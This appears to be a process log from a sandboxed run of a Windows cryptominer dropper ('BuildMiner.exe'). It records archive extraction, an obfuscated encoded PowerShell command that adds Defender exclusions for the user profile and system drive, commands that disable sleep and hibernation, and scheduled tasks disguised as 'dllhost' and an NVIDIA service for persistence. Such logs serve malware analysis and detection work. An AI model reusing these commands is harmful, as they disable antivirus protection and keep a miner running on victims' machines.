mode.com mode 65,10
2172 7z.exe 7z.exe e file.zip -p72822978824107435963403340 -oextracted
2228 7z.exe 7z.exe e extracted/file_3.zip -oextracted
2276 7z.exe 7z.exe e extracted/file_2.zip -oextracted
2324 7z.exe 7z.exe e extracted/file_1.zip -oextracted
2372 attrib.exe attrib +H "BuildMiner.exe"
2420 cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAGQAYwBqAEMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB1AHgAQwBZAGUAQwBuAGUAbABCACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAEwAQgBTAGgAMgBBADUAMQB1AHUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMATABsAEUASgBwAGkAVwBPACMAPgA=" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
2644 powershell.exe powershell -EncodedCommand "PAAjAGQAYwBqAEMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB1AHgAQwBZAGUAQwBuAGUAbABCACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAEwAQgBTAGgAMgBBADUAMQB1AHUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMATABsAEUASgBwAGkAVwBPACMAPgA="
2700 powercfg.exe powercfg /x -hibernate-timeout-ac 0
2824 powercfg.exe powercfg /x -hibernate-timeout-dc 0
2872 powercfg.exe powercfg /x -standby-timeout-ac 0
2920 powercfg.exe powercfg /x -standby-timeout-dc 0
2964 powercfg.exe powercfg /hibernate off
3008 cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2316 schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2612 cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk7232" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2388 schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk7232" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2620